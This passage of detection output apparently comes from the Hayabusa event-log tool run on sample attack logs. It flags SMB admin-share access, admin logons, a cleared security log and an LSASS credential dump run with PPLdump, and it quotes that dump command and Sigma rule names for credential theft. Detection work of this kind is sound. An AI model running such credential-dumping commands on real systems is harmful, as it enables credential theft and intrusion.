+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 
0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v 
lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CreateMiniDump Hacktool,,rules/sigma/file_event/file_event_hktl_createminidump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 